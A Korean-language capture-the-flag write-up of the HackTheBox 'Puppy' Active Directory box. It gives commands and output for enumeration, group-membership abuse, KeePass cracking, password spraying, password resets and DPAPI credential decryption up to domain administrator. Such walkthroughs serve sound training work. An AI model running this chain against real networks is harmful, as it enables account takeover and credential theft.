Box Info
| Name | Difficulty |
|---|---|
| Puppy | Medium |
As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!
nmap
[Oct 06, 2025 - 16:35:47 (KST)] exegol-htb
puppy # nmap -sC -sS -sV -T4 "$TARGET_IP"
Starting Nmap 7.93 ( https://nmap.org ) at 2025-10-06 16:35 KST
Nmap scan report for puppy.htb (10.10.11.70)
Host is up (0.25s latency).
Not shown: 986 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-06 14:37:37Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open status 1 (RPC #100024)
3260/tcp open iscsi?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-10-06T14:39:40
|_ start_date: N/A
|_clock-skew: 7h01m14s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 259.36 secondsOpen Services
- 88/tcp : kerberos
- 445/tcp : smb
- 389/tcp : LDAP
Active Directory 환경으로 보입니다.
Crack kdbx File
puppy # nxc smb dc.puppy.htb -u levi.james -p KingofAkron2025! -d puppy.htb --shares
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [+] puppy.htb\levi.james:KingofAkron2025!
SMB 10.10.11.70 445 DC [*] Enumerated shares
SMB 10.10.11.70 445 DC Share Permissions Remark
SMB 10.10.11.70 445 DC ----- ----------- ------
SMB 10.10.11.70 445 DC ADMIN$ Remote Admin
SMB 10.10.11.70 445 DC C$ Default share
SMB 10.10.11.70 445 DC DEV DEV-SHARE for PUPPY-DEVS
SMB 10.10.11.70 445 DC IPC$ READ Remote IPC
SMB 10.10.11.70 445 DC NETLOGON READ Logon server share
SMB 10.10.11.70 445 DC SYSVOL READ Logon server share주어진 Credential로 접근 가능한 SMB 디렉토리 목록을 확인 후 READ 권한이 있는 디렉토리에 접속 해봤는데, 접속이 안되었습니다.
아래 명령어로 Active Directory 데이터 수집 후 Bloodhound에 올려보니 levi.james 유저가 HR 그룹에 속해있는걸 확인했습니다
bloodhound-python \
-u 'levi.james' \
-p 'KingofAkron2025!' \
-d 'puppy.htb' \
-c all \
-dc 'dc.puppy.htb' \
-ns 10.10.11.70 \
--zip
bloodhound-quickwin을 사용해보니 HR 그룹이면 DEVELOPERS에 대해 GenericWrite 권한이 있는걸 확인할 수 있었습니다.
[Oct 06, 2025 - 17:39:06 (KST)] exegol-htb
puppy # bloodhound-quickwin -u neo4j -p exegol4thewin
▬▬ι═══════ﺤ BloodHound QuickWin @ kaluche_ -═══════ι▬▬
###########################################################
[*] Enumerating all domains admins (rid:512|519|544) (recursive)
###########################################################
[+] Domain admins (group) : DOMAIN [email protected]
[+] Domain admins (group) : ENTERPRISE [email protected]
[+] Domain admins (enabled) : [email protected] [LASTLOG: < 1 year]
[+] Domain admins (enabled) : [email protected] [LASTLOG: < 1 year]
###########################################################
[*] Enumerating privileges SPN
###########################################################
---
###########################################################
[*] Can configure Resource-Based Constrained Delegation
###########################################################
[+] RBCD : configure from [email protected] --> GenericWrite --> [email protected]
[+] RBCD : configure from SENIOR [email protected] --> GenericAll --> [email protected]
###########################################################
---levi.james 유저를 DEVELOPERS 그룹에 추가 후 다시 nxc 로 권한을 확인해보니 DEV 디렉토리에 READ 권한이 생겼습니다.
[Oct 06, 2025 - 22:12:35 (KST)] exegol-htb
puppy # bloodyAD --host 'puppy.htb' -d 'dc.puppy.htb' -u 'levi.james' -p 'KingofAkron2025!' add groupMember 'DEVELOPERS' levi.james
[+] levi.james added to DEVELOPERS
smb로 접속 후 recovery.kdbx 파일을 받았습니다.
puppy # smbclient \\\\puppy.htb\\DEV -U 'levi.james%KingofAkron2025!'
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Tue Oct 7 01:49:04 2025
.. D 0 Sun Mar 9 01:52:57 2025
KeePassXC-2.7.9-Win64.msi A 34394112 Sun Mar 23 16:09:12 2025
Projects D 0 Sun Mar 9 01:53:36 2025
recovery.kdbx A 2677 Wed Mar 12 11:25:46 2025
5080575 blocks of size 4096. 1582686 blocks available
smb: \> get recovery.kdbx
getting file \recovery.kdbx of size 2677 as recovery.kdbx (2.0 KiloBytes/sec) (average 2.0 KiloBytes/sec)해당 파일을 keepass2john 툴을 사용하여 크랙 진행 후 복호화를 성공하여 liverpool이라는 비밀번호를 얻었습니다.
[Oct 06, 2025 - 23:24:49 (KST)] exegol-htb
puppy # keepass2john recovery.kdbx > out.kbdx.hashes && john --wordlist=`fzf-wordlists` out.kbdx.hashes
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [AES/Argon2 32/64])
Cost 1 (t (rounds)) is 37 for all loaded hashes
Cost 2 (m) is 65536 for all loaded hashes
Cost 3 (p) is 4 for all loaded hashes
Cost 4 (KDF [0=Argon2d 2=Argon2id 3=AES]) is 0 for all loaded hashes
Will run 10 OpenMP threads
Note: Passwords longer than 41 [worst case UTF-8] to 124 [ASCII] rejected
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
liverpool (recovery)
1g 0:00:03:51 DONE (2025-10-06 23:29) 0.004315g/s 5.523p/s 5.523c/s 5.523C/s 123456..poohbear1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.얻은 정보로 pykeepass라이브러리를 이용하여 각 계정별 비밀번호를 획득했습니다.
from pykeepass import PyKeePass
kp = PyKeePass('recovery.kdbx', password='liverpool')
for e in kp.entries:
if e.title:
print(e.title, ":", e.password or "")[Oct 07, 2025 - 12:40:57 (KST)] exegol-htb
puppy # python3 dump_kp.py
JAMIE WILLIAMSON : JamieLove2025!
ADAM SILVER : HJKL2025!
ANTONY C. EDWARDS : Antman2025!
STEVE TUCKER : Steve2025!
SAMUEL BLAKE : ILY2025!계정 리스트는 아래와 같이 nxc를 이용하여 출력된 계정 이름들을 따로 저장하여 계정 로그인 시도를 진행했습니다.
[Oct 07, 2025 - 00:01:37 (KST)] exegol-htb
puppy # nxc smb "$TARGET_IP" -u 'levi.james' -p 'KingofAkron2025!' --users
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB 10.10.11.70 445 DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.70 445 DC Administrator 2025-02-19 19:33:28 4 Built-in account for administering the computer/domain
SMB 10.10.11.70 445 DC Guest <never> 4 Built-in account for guest access to the computer/domain
SMB 10.10.11.70 445 DC krbtgt 2025-02-19 11:46:15 0 Key Distribution Center Service Account
SMB 10.10.11.70 445 DC levi.james 2025-02-19 12:10:56 0
SMB 10.10.11.70 445 DC ant.edwards 2025-02-19 12:13:14 0
SMB 10.10.11.70 445 DC adam.silver 2025-10-06 21:49:29 9
SMB 10.10.11.70 445 DC jamie.williams 2025-02-19 12:17:26 4
SMB 10.10.11.70 445 DC steph.cooper 2025-02-19 12:21:00 4
SMB 10.10.11.70 445 DC steph.cooper_adm 2025-03-08 15:50:40 4
SMB 10.10.11.70 445 DC [*] Enumerated 9 local users: PUPPY아래와 같이 각 계정 / 비밀번호를 무작위 대입 공격을 진행하여 로그인 성공이 되는 Credential을 찾았습니다.
[Oct 06, 2025 - 23:59:29 (KST)] exegol-htb
puppy # nxc smb "$TARGET_IP" -u users.txt -p pass.txt
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-]
---
PUPPY.HTB\Guest:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!| user | password |
|---|---|
| ant.edwards | Antman2025! |
Reset adam.silver Password
해당 계정은 SENIOR DEVS그룹에 속해 있고, ADAM.SLIVER 유저에 대해 GenericAll 권한이 있는걸 확인했습니다.
그리고 ADAM.SILVER 계정은 REMOTE MANAGEMENT USERS 그룹에 속해 있어서 winrm 접속이 가능할 것 같아보였습니다.
kdbx에서 봤던 정보 ADAM SILVER : HJKL2025!로 먼저 로그인을 시도해봤는데 실패했습니다.
[Oct 08, 2025 - 00:11:35 (KST)] exegol-htb
puppy # nxc winrm dc.puppy.htb -u 'adam.silver' -p 'HJKL2025!'
WINRM 10.10.11.70 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:PUPPY.HTB)
WINRM 10.10.11.70 5985 DC [-] PUPPY.HTB\adam.silver:HJKL2025!그래서 ant.edwards / Antman2025!계정으로 adam.silver 계정의 비밀번호를 변경 후 winrm을 테스트 해보니, STATUS_ACCOUNT_DISABLED라고 뜨며 실패했습니다.
[Oct 08, 2025 - 00:14:47 (KST)] exegol-htb
puppy # bloodyAD --host 'puppy.htb' -d 'dc.puppy.htb' -u 'ant.edwards' -p 'Antman2025!' set password 'adam.silver' 'Testpw!'
[+] Password changed successfully!
[Oct 08, 2025 - 00:15:44 (KST)] exegol-htb
puppy # nxc smb dc.puppy.htb -u 'adam.silver' -p 'Testpw!'
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:Testpw! STATUS_ACCOUNT_DISABLED그래서 bloodhound 에서 확인해보니 실제로 Enabled 항목이 False인 것을 확인 후 해제를 진행했습니다.
[Oct 08, 2025 - 00:23:57 (KST)] exegol-htb
puppy # bloodyAD --host puppy.htb -d puppy.htb -u 'ant.edwards' -p 'Antman2025!' remove uac 'adam.silver' -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from adam.silver's userAccountControl
로그인 성공을 확인 후 evil-winrm으로 접속 후 user.txt를 획득했습니다.
DPAPI Credential Decryption
C:\Backups 경로에 백업 파일이 있는 걸 확인 후 다운을 받았습니다.
다운받은 파일 압축 해제 후 nms-auth-config.xml.bak 파일을 확인해보니 steph.cooper 계정의 비밀번호를 얻어서 nxc로 winrm 로그인이 되는지 확인했습니다.
| user | password |
|---|---|
| steph.cooper | ChefSteph2025! |
evil-winrm으로 접속 후 winPEAS를 돌려봤는데, steph.cooper_adm 계정이 Administrator인 걸 확인했습니다.
그리고 winPEAS에서 추가적으로 DPAPI 관련 정보를 찾았서 복호화를 진행했습니다.
https://infosecwriteups.com/decrypting-dpapi-credentials-offline-8c8f27207956
위 블로그를 참고하여 DPAPI 파일 복호화를 진행했습니다.
복호화 방법은 다른 방법도 있음(ex: mimikatz)
[Oct 08, 2025 - 23:29:47 (KST)] exegol-htb
puppy # dpapi.py masterkey -file ./DPAPI_Master_key/556a2412-1275-4ccf-b721-e6a0b4f90407 -sid 'S-1-5-21-1487982659-1829050783-2281216199-1107' -password 'ChefSteph2025!'
Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags : 0 (0)
Policy : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
[Oct 08, 2025 - 23:29:51 (KST)] exegol-htb
puppy # dpapi.py credential -file ./DPAPI_Creds_file/C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29+00:00
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=PUPPY.HTB
Description :
Unknown :
Username : steph.cooper_adm
Unknown : FivethChipOnItsWay2025!| user | Password |
|---|---|
| steph.cooper_adm | FivethChipOnItsWay2025! |
 |
wimrm 로그인 성공 로그를 확인 후 evil-winrm으로 접속해서 root.txt를 획득했습니다.
Summary
user.txt
levi.james계정으로Developers그룹에levi.james계정 추가recovery.kdbx파일 다운 후 Credentials 획득 후 nxc를 이용하여 무작위 대입 진행해서ant.edwards계정 정보 획득ant.edwards→SENIOR DEVS→adam.silver이런 루트로adam.silver비밀번호 재설정 후evil-winrm접속하여user.txt획득
root.txt
C:\Backups경로에 있는zip파일 다운 후nms-auth-config.xml.bak파일에서steph.cooper계정 정보 획득winPEAS에서steph.cooper_adm유저 권한이Administrator확인 및DPAPI관련 파일 정보 확인 후dpapi.py이용하여 복호화 진행- 복호화 진행해서
steph.cooper_adm로 로그인해서root.txt획득